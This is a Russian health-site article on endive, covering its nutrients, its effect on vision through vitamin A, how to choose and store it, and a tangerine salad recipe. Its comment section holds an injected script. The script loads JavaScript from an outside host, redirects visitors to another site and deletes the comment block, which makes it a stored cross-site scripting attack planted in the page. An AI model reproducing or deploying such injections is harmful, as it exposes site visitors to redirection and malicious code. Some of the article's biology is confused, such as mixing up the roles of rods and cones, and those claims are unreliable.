Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Эндивий для остроты зрени...  >>  Эндивий для остроты зрения
 
Обратная связь
 

Эндивий для остроты зрения

Размер шрифта
11 марта 2012 10:00
  • google_analytics: false
  • Нравится

Можно ли белое растение назвать зеленью? Цвет цветом, но нас больше интересует вкус и, конечно же, полезные свойства. Давайте поговорим об эндивии.

1

История употребления в пищу

Эндивий использовался в салатах еще во времена Римской империи, затем был надолго забыт, но в последние десятилетия вновь усилилась кулинарная мода на этот салат.

Салат эндивий является разновидностью латука. Он имеет белые, плотные, мясистые листья, собранные в тугой продолговатый бутон. Бывает эндивий кудрявый и широколистный. Выращивание этого салата состоит из двух этапов: летом выращивают корнеплоды, а зимой в темноте из них растят свежие кочанчики. Употребляется в основном для зимних и весенних салатов.

Полезная информация

По вкусу салат немного горьковат, но очень полезен. Вещество инулин, которому салат обязан своим горьковатым вкусом, регулирует обмен веществ в организме и применяется в противодиабетической диете как заменитель сахара.

Интибин, также содержащийся в эндивии, положительно влияет на работу пищеварения, печени, желчного пузыря, кроветворных органов и сердечно-сосудистой системы.

Чем полезен эндивий:

  • Витамин А способствует улучшению кожи, улучшает зрение и снижает утомленность глаз.
  • Витамин С укрепляет иммунную систему, уменьшает уровень холестерина.
  • Калий необходим для хорошей работы мышц и для правильной работы сердца. Недостаток этого элемента нарушает нормальный ритм сердечных сокращений, что может провоцировать сердечные приступы.
  • Магний повышает в крови уровень «полезного» холестерина и снижает уровень «вредного», предупреждает образование камней в почках, а также смягчает проявления предменструального синдрома у женщин.
  • Железо входит в состав гемоглобина и участвует в переносе кислорода. Также без железа невозможен синтез гемоглобина и образование нормальных эритроцитов. Железо необходимо и для роста волос и ногтей.

Пьедестал почета по содержанию витамина А

Эндивий – 2167 МЕ
Укроп – 134 МЕ
Капуста – 126 МЕ

Для восполнения витамина А суточная доза эндивия - 115 гр.

Зачем нам нужен витамин А?

  • Витамин А способствует улучшению кожи. Он ускоряет клеточное обновление, говоря медицинским языком, он является кераторегулятором, т. е. клетки кожи созревают гораздо быстрее, происходит их отшелушивание, и молодые клетки занимают свое место на поверхности кожи.
  • Витамин А влияет на улучшение зрения и на способность видеть в темноте.

В норме в темноте через 20-30 секунд человек должен различать желтый и синий цвет. Если синий цвет не различается, а вместо желтого видно лишь светлое пятно, это может быть симптомом куриной слепоты. Она возникает при недостатке витамина А.

Дело в том, что на сетчатке глаза есть два вида клеток – палочки и колбочки. Палочки отвечают за сумеречное зрение и ориентирование в темноте, а колбочки отвечают за цвета, остроту зрения.

Колбочки содержат вещества, которые распадаются под действием света, в результате возбуждаются нервные волокна, выходящие из глаза. Светочувствительное вещество в палочках называют родопсином (зрительный пурпур), а образуется он из витамина А.

При недостатке витамина А родопсин в колбочках глаза не восстанавливается, ониперестают действовать, и человек плохо видит в темноте и не различает цвета.

Как правильно выбрать эндивий

Как мы уже сказали, существуют два основных вида эндивия – кудрявый и широколистный. Листья у этого салата сочные, хрустящие.

При выборе кудрявого эндивия, самое главное, чтобы листья были яркие и без повреждений. Без темных пятен и слизистых участков. Края листьев не должны быть коричневыми.
Для широколистного эндивия, требования те же, но еще сами листья должны быть ровными, без вмятин. Присутствие вмятин говорит о несвежести салата.

По цвету широколистный эндивий должен быть ярким, но не пугайтесь желтых концов. Это нормально для этого типа салата. Бледно-желтая или белая окраска листьев салата обусловлена тем, что кочанчики растут в темноте. И чем светлее окраска – тем меньше в листьях горечи. Потемневшие коричневые концы говорят о несвежести.

Как правильно хранить эндивий

Эндивий, как и любой другой салат, должен храниться отдельно от фруктов в холодильнике. Яблоки, к примеру, выделяют газ этилен, который вызывает появление на листьях салата бурых пятен.

Перед тем как положить салат в холодильник, надо его вымыть и просушить, а затем завернуть в слегка влажную ткань и положить в вакуумный контейнер. Так эндивий сохранит свою свежесть надолго.

С момента срезания кочанчики широколистного эндивия сохраняют свои вкусовые качества в прохладном месте до 1 недели.

Для устранения горечи, если это необходимо, листья промывают в течение 15-20 минут в чуть теплой воде. При тепловой обработке горечь уходит. Но этого делать не рекомендуется, потому что именно из-за горечи эндивий и полезен. В широколистном эндивии вся горечь сконцентрирована в донышке, которое можно просто отрезать.

Если вам кажется, что листья стали менее сочными и хрустящими, подержите эндивий в глубокой плошке с ледяной водой. Это освежит салат.

1

Как правильно готовить эндивий

Эндивий используют в основном в сыром виде. Его добавляют в первые и вторые блюда. Нарезанные соломкой или свернутые в виде чашечек для отдельных порций, они могут играть вспомогательную роль в холодных блюдах, приготовленных из овощей, мяса, птицы или рыбы. Это станет прекрасным и полезным украшением. Очень редко салат тушат или обжаривают, потому что при термической обработке теряется значительная часть витаминов, а вместе с этим и его лечебные свойства.

Рецепт cалата из эндивия и мандаринов

Ингредиенты:
салат эндивий кудрявый и широколистный – 1 шт.;
йогурт без добавок – 200 г;
мандарин – 6 шт.;
семена подсолнечника – 40 г;
лимонный сок – 2 ст. л.;
неострая горчица – 1 ч. л.;
мед (жидкий) – 1 ст. л.

Приготовление:
Эндивий очистить и нарезать узкими полосками. Тщательно промыть и хорошо обсушить. Смешать йогурт с горчицей, медом и лимонным соком до получения соуса. Полить эндивий соусом, смешать с половиной семечек и разложить на тарелки. Оставшимися семечками посыпать салат. Мандарины очистить, разделить на дольки, сняв тонкие пленочки, или нарезать кусочками. Украсить ими тарелки с салатом.

 

Сюжеты по теме:
Белая зелень. Рецепт салата из эндивия

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.